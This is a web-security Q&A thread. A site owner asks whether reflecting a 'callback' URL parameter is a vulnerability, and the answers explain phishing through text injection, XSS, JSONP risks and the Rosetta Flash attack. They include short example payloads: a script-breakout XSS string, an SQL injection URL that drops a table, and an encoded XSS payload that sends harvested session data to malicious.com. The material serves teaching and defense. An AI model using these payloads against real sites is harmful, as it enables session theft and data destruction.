53

Someone reported a bug on my site that I don't really consider an issue. My site has an URL akin to this:

www.site.com/ajax/ads.asp?callback=[text injection]

So filetype is application/json, and I don't see how that can affect security of site.

His point of contention was that it can bypass crossdomain.xml if someone visits page with this in it:

<script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script>

I did a search for this but couldn't really find any information that says what he is saying is true. I need someone to tell me how serious this is, if I really need to go through my scripts to fix every instance of this bug.

Andrew Hoffman
  • 1,987
  • 14
  • 17
Daniel
  • 1,422
  • 3
  • 21
  • 32
  • 3
    @JustinLardinois [Sounds like](https://www.google.com.au/search?hl=en&q=crossdomain.xml&gws_rd=ssl) an [Adobe](http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html) [policy file](http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html) used by their plugins (Flash, Reader, etc.). – Bob Dec 14 '14 at 22:27
  • @user1203028 Do you echo the callback value in the first bytes of the response? – Lucas NN Dec 15 '14 at 14:56
  • What does `ads.asp` serve? Does it contain any information relating to the user currently logged into `site.com`? – Ry- Dec 15 '14 at 15:50
  • 4
    Shouldn't that be a [JSONP response](https://en.wikipedia.org/wiki/JSONP) with content-type `application/javascript`? What data does the JSON contain, and what exactly happens to the `callback` parameter value? – Bergi Dec 15 '14 at 16:26
  • 14
    Here is a good example i saw.[Opera now recommends Firefox or Chrome for Windows](http://www.opera.com/download/guide/?ver=now%20recommends%20Firefox%20or%20Chrome) – Himal Dec 16 '14 at 01:10
  • 5
    Golden rule: Never trust user input. – John Dec 16 '14 at 20:34
  • How "directly" are you injecting it? What happens if the query string contains an HTML tag? – Random832 Dec 16 '14 at 20:50
  • @Andrew Given that the file type is `application/json`, I'm not sure this qualifies as injecting values into HTML. – Ajedi32 Dec 16 '14 at 21:24
  • @Ajedi32 Not enough info provided, but Lie Ryan's accepted answer assumed using the text directly in the markup. Either way its still the DOM. – Andrew Hoffman Dec 16 '14 at 22:39
  • If the `callback=[text injection]` text is only being echoed back to the browser of the user who issued the request, I don't see an issue. If it is being stored and possibly sent to other people's browsers, *then* it is a security risk. – Tom Robinson Dec 17 '14 at 00:36
  • @Himal Saved http://web.archive.org/web/20141222064837/http://www.opera.com/download/guide/?ver=now%20recommends%20Firefox%20or%20Chrome – Cole Tobin Dec 22 '14 at 06:49

6 Answers6

57

Plaintext injection is an issue. Say you have a page template that looks like this:

Hi <name>,

Blah blah blah.

And you can inject from the URL.

An attacker can construct an email with a link to www.example.com/ajax/ads.asp?name=Foo%2C+you+have+the+wrong+version+Flash+plugin%2C+our+company+policy+requires+that+you+use+version+vul.ne.rabl.e.%0D%0A%0D%0AHi%020Foo (which could also be minified).

This will make your page look like:

Hi Foo, you have the wrong version Flash plugin, our company policy requires that you use version vul.ne.rabl.e.

Hi Foo,

Blah blah blah.

The message looks like it comes from your site, and since your users trusts your site, they will likely believe the instructions that "you" have given.

TRiG
  • 609
  • 5
  • 14
Lie Ryan
  • 31,089
  • 6
  • 68
  • 93
  • Can you please explain how is this a threat? – A.L Dec 15 '14 at 19:07
  • 6
    @A.L Social Engineering. Like phishing – Canadian Luke Dec 15 '14 at 19:11
  • 3
    @CanadianLuke Like replacing the content of the site with a fake form? – A.L Dec 15 '14 at 19:13
  • 3
    @A.L That's one way to do it. But the point is, it is making the user trust the vulnerable site's information to be true and accurate; I've seen many "fake" Adobe Flash player installs that bring lots of "additional features", or viruses, in – Canadian Luke Dec 15 '14 at 19:21
  • @CanadianLuke If the script is only inserting plaintext with a text node, then the phisher can't inject a link. Of course, the phisher could show a URL for the user to paste (it must be more secure if they're asking me to paste it xD) – aebabis Dec 15 '14 at 23:42
  • 2
    @acbabis: you don't need links to do social engineering. Social Engineering exploits human and trust. A lot of people now know to double check suspicious emails on the website, but if you have a vulnerable website itself, then things becomes really hairy. – Lie Ryan Dec 16 '14 at 00:48
  • 1
    I still dont get how it's a security issue to let a user run whatever js he wants...js happens on the user end...Is he hacking himself? Unless a hacker has access to your webserver, how is he injecting anything into other user's pages? – Doug Cassidy Jul 19 '15 at 00:56
44

Cross site scripting is not a threat to the integrity of your web server. Rather, the problem is that an attacker can craft a site.com URL that will execute arbitrary JavaScript. If your users trust your site and allow it to do whatever it wants, this could be a major security hole.

user2752467
  • 971
  • 7
  • 11
  • 29
    +1 it's not your webserver that's at risk - it's your customers and your reputation. – Grant Dec 14 '14 at 22:25
23

Imagine if the injected text was:

"></script><script>alert("hi");"

which would make it look like this:

<script src="http://www.site.com/ajax/ads.asp?callback="></script><script>alert("hi");""></script>

Then, you have a working custom script that can do anything it wants in the page.

jfriend00
  • 524
  • 2
  • 7
  • 2
    Hmm , that would not affect my site, since alert('hi') is executed on page where – Daniel Dec 14 '14 at 21:29
  • 24
    The point is the attacker could have whatever code they wanted executing in your page. If there was any secure data in that page (passwords, other data, etc...) the inserted script could have full access to that data, including the ability to send it off to other servers. – jfriend00 Dec 14 '14 at 22:16
  • 1
    I downvoted this. My understanding of the OP's question is that `` is what would be included on *the attacker's* site in order to exploit the vulnerability (if it is indeed possible to exploit). Not that his site would generate that code. – user253751 Dec 17 '14 at 02:22
2

His point of contention was that it can bypass crossdomain policies if someone visits page with this in it:

<script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script>

Yes, he's right. But that doesn't seem to be a security hole, instead, it looks like a feature. This technique of circumventing the same-origin-policy is called JSONP (and is very well documented).

However, there are some catches:

  • The correct content-type for JSONP responses is application/javascript, as they are executable scripts. It's no longer plain JSON.
  • If you don't know of JSONP or how it works, it's suspicious that you're using it. Whether this is a serious bug depends on what you are using it for:
  • JSONP can be exploited, as this is its nature. Make sure that you are not sending any confidential data, only such information that you want to be publicly accessible.
    Make sure to treat any requests for JSONP resources as if they had no credentials.
Bergi
  • 277
  • 2
  • 10
2

There is an attack that uses this exact attack vector, called Rosetta Flash (CVE-2014-4671).

As explained on the Rosetta Flash page, the vulnerability is that:

  1. With Flash, a SWF file can perform cookie-carrying GET and POST requests to the domain that hosts it, with no crossdomain.xml check. This is why allowing users to upload a SWF file on a sensitive domain is dangerous: by uploading a carefully crafted SWF, an attacker can make the victim perform requests that have side effects and exfiltrate sensitive data to an external, attacker-controlled, domain.

  2. JSONP, by design, allows an attacker to control the first bytes of the output of an endpoint by specifying the callback parameter in the request URL.

  3. SWF files can be embedded on an attacker-controlled domain using a Content-Type forcing <object> tag, and will be executed as Flash as long as the content looks like a valid Flash file.

This specific vulnerability has been mitigated by an update to Flash Player, but older versions are still vulnerable, and this same technique could conceivably be used to attack other systems.

Generalizing from this specific vulnerability: whenever possible it is best to not allow an attacker to control the first few bytes of any response you send, since that is the part "helpfully" used by browsers and other clients to sniff your content type, and browsers have been known to override Content-Type headers based on sniffed content in the past.

Daniel Pryden
  • 895
  • 1
  • 6
  • 12
1

I think OP is focusing on the wrong place by looking at the URL. All GET and POST parameters can be abused, regardless of what they're called. The only relevant code is that which uses this parameter.

For example, you can have an SQL injection vulnerability if you concatenate this parameter on to an SQL query:

db_query("SELECT code FROM callbacks WHERE id = " + param("callback"))

A user could visit:

www.site.com/ajax/ads.asp?callback=0;DROP+users

You have an XSS vulnerability if you're doing something like:

return new Response("Hello " + param("callback"))

A user could visit:

www.site.com/ajax/ads.asp?callback=%3Cscript%3EaddToDom(%27%3Cimg%20src%3D%22http%3A%2F%2Fmalicious.com%2F%3Fdata%3D%27%2BharvestSessionData()%2B%27%22%2F%3E%27)%3C%2Fscript%3E

These are all variations on the same theme: treating all languages as strings, which allows them to be mixed. Other examples are shell injection, eval-based code injection, breaking out of "quotations", etc.

You can also defer these same vulnerabilities if you store the parameter somewhere:

// Escape the parameter when we use it in our SQL
db_query('INSERT INTO callbacks (:cb)', {'cb': param('callback')})

// But suffer the same problems in a later request
return new Response("Our callbacks include " + db_query("SELECT * FROM callbacks").join(", "))
Warbo
  • 111
  • 4